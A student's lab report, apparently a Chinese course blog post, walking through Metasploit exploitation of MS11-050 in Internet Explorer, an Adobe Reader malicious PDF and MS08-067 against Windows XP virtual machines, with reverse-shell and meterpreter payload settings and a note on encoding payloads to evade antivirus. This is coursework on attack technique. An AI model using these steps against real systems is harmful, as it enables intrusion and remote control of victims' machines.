《网络攻防》实验五:MSF基础应用
IE浏览器渗透攻击——MS11050安全漏洞
实验准备
1.两台虚拟机,其中一台为kali,一台为Windows Xp Professional(两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、在kali终端中开启msfconsole
。
2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,进入该漏洞模块。
3、输入info查看信息:
4、设置对应的载荷set payload windows/meterpreter/reverse_tcp
;
一不小心输错指令,看来一边听歌一边输指令还是容易出错啊!
5、使用指show options
查看需要设置的相关信息:
6、使用指令set LHOST ‘kali Ip’
,set LPORT XXX
、set URIPATH XXX
设置地址,端口,统一资源标识符路径。
设置后,使用指令show options
查看
7、使用指令exploit
,以图可知,靶机需要访问的ip地址:http://192.168.88.147:8080/blog
8、在靶机IE上输入网址,并在靶机上查看信息。
如果你用的IE浏览器版本是1.7之前的,你会看到这样的结果
实验结果的最后是不会创建session 1,所以请用1.7以上版本的IE浏览器输入需要访问的ip地址。这样,你才能看到
kali中显示一个session 1已经创建
9、输入命令sessions -i 1,
开始连接
Adobe阅读器渗透攻击
实验准备
1.两台虚拟机,其中一台为kali,一台为Winattacker (两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、在kali终端中开启msfconsole
。
2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用。
3、使用命令set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷。
4、输入命令show options
显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
5、输入指令set FILENAME xxx.pdf
、 set LHOST "KALI Ip"
、set LPORT xxxx
生成你命名的pdf、设置地址、端口。
设置后,使用指令show options
查看
6、输入exploit
,生成pdf文件,并可以看到pdf所在文件夹,
将pdf复制到靶机里。再次之前,先安装一下增强工具吧
7、使用命令back
退出当前模块,并使用use exploit/multi/handler
新建一个监听模块。
8、使用set payload windws/meterpreter/reverse_tcp
建立一个反向连接。
9、使用命令exploit
开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:
输入指令sysinfo
显示靶机相关信息
MS08_067漏洞渗透攻击实践
实验准备
1.两台虚拟机,其中一台为kali,一台为WinXPenSP3 (两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
MS08_067远程漏洞攻击实践:Shell
1、在kali终端中开启msfconsole
。
2、输入命令search ms08_067
,会显示出找到的渗透模块,如下图所示:
3、输入命令use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用。
4、输入命令show payload
会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。
5、命令show targets
会显示出可以被攻击的靶机的操作系统型号,如下图所示:
6、使用命令set payload generic/shell_reverse_tcp
设置攻击有效载荷。
7、输入命令show options
显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
8、输入指令set LHOST "kali Ip"
、 set RHOST "Win xp Ip"
,设置后使用命令show options
再次查看payload状态。
9、输入命令exploit
开始攻击,如下图所示是正常攻击成功结果。
在kali上执行ipconfig/all
得到如下图所示:
在win xp上执行同样的命令,如下图所示:
MS08_067远程漏洞攻击实践:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,进入ms08_067漏洞模块。
2、设置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要设置的ip地址,如下图所示,是已经设置好的
4、成功攻击结果:
5、执行ifconfig
,查看靶机地址:
在靶机上执行ifconfig
应用辅助模块
实验准备
1.两台虚拟机,其中一台为kali,一台为Win8 (虚拟机与主机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、先手动创建一个msf所需的数据库,使用指令service postgresql start
、msfdb start
2、开启msf,使用指令msfconsole
3、开启nmap扫描,可以看见开启的端口号,以及目标机的操作系统
用自己的话解释什么是exploit,payload,encode.
exploit
,Metaploit目录中所有可用的漏洞利用代码。
payload
,Metaploit目录中攻击载荷,是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。
encode
,对后门程序进行编码处理,使其免杀。
实验总结与体会
首先,我要坦白,因为本次四个实验我完全按着科技负责人张亚军的实验博客照本宣科,没有创新。我也曾不愿活在张亚军同学的“影子”下,一个叫羞耻心的小人在我心里疯狂呐喊着“我想当勇士!我要利用一个和别人都不一样漏洞做实验!”于是我百度到一个 叫Ms07-029
远程溢出漏洞,根据相关资料,我明白了在exploit之前,我需要下一个叫dns.exe的小工具。不得不说,现在在网上下载这些小工具,真的是大浪淘沙,看到各种绿色无毒,快速下载的幌子,我头都大了。生怕下载工具后,在桌面右下角弹出美女照片,我从来没有这么抗拒美女照片过。好吧,工夫不负有心人
喏,就是它了。首先要打开它,我在Kali里打开它,提示我无法打开二进制文件,于是我决定在主机WIN下打开,在我输入./dns.exe
指令后,终端提醒我.不是内部指令,后来我百度了才知道,在WIN终端下打开文件的命令是staet,好怕娄老师跳出来打我呀。好吧,在我输入指令start dns.exe
后,有个转瞬即逝的窗口,纳尼?这就没了,这和我看得实验指导书不一样啊,按理说剧本应该是这样
然而现实给我一个下勾拳
在寻求班级大触高其的帮助后依然无果后,一阵疲惫感不由自主地泛上心头,原来勇士不是那么好做的。心里的大坝最终还是决堤了,飞流直下,小人儿失落地站在瀑布底,沉默地淋着。至此,我知道我的雄心壮志不过三分钟热度,狼狈不堪地收拾散落一地的道具,删除dns.exe,关掉网上的指导书,结束闹剧。
《网络攻防》实验五:MSF基础应用的更多相关文章
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
- 20155328 网络攻防 实验五:MSF基础应用
20155328 网络攻防 实验五:MSF基础应用 实践内容及过程记录 一.Windows服务渗透攻击----ms08_067 攻击机:kali 靶机:WindowsXP(英文版) 第一步,分别查看攻 ...
- 2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用
2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块expl ...
- 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用
20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
- 20155318 《网络攻防》Exp5 MSF基础应用
20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...
- 20155321 《网络攻防》 Exp5 MSF基础应用
20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...
随机推荐
- 在选定合适的执行引擎之后,通过敏感字段重写模块改写 SQL 查询,将其中的敏感字段根据隐藏策略(如只显示后四位)进行替换。而敏感字段的隐藏策略存储在 ranger 中,数据管理人员可以在权限管理服务页面设置各种字段的敏感等级,敏感等级会自动映射为 ranger 中的隐藏策略。
https://mp.weixin.qq.com/s/4G_OvlD_5uYr0o2m-qPW-Q 有赞大数据平台安全建设实践 原创: 有赞技术 有赞coder 昨天
- CSS布局与定位——height百分比设置无效/背景色不显示
CSS布局与定位——height百分比设置无效/背景色不显示 html元素属性width和height的值有两种表达方式,一是固定像素如“100px”,一是百分比如“80%”, 使用百分比的好处是元素 ...
- 设计模式之——flyweight模式
flyweight模式,又叫做享元模式. 顾名思义,享元模式就是共享一个元素. 百度百科 解释为: 享元模式(英语:Flyweight Pattern)是一种软件设计模式.它使用共享物件,用来尽可能减 ...
- mysql主从服务器的配置
使用mysql主从复制的好处有: 1.采用主从服务器这种架构,稳定性得以提升.如果主服务器发生故障,我们可以使用从服务器来提供服务. 2.在主从服务器上分开处理用户的请求,可以提升数据处理效率. 3. ...
- EControl平台测试向生产版本工程切换说明
第一步,备份生产环境版本,假设生产环境版本工程名为SEHEControl,记录版本说明第二部,拷贝测试版本到新文件夹,假设测试版本工程名为SEHEControlTest第三步,进入工程文件夹,修改SL ...
- python count()
count() 描述 Python count() 方法用于统计字符串里某个字符出现的次数.可选参数为在字符串搜索的开始与结束位置. 语法 count()方法语法: str.count(sub, st ...
- .NET数据挖掘与机器学习开源框架
1. 数据挖掘与机器学习开源框架 1.1 框架概述 1.1.1 AForge.NET AForge.NET是一个专门为开发者和研究者基于C#框架设计的,他包括计算机视觉与人工智能,图像处理,神经 ...
- Hadoop 之日志管理—应用在 YARN 中运行时的日志
背景: 在写这篇博文前,自己一直没有弄明白一个问题,“在 Map 函数和 Reduce 函数中使用 System.out.print 打印日志时,输出内容在哪里显示?”.试了好多回,在 log/* 目 ...
- [django]JsonResponse序列化数据
def home(request): data = { 'name': 'maotai', 'age': 22 } import json return HttpResponse(json.dumps ...
- [py][mx]django使用class写views-免去判断方法的烦恼
修改views使用class模式 类模式写views - 免去了函数模式的判断的烦恼 users/views.py from django.views.generic import View clas ...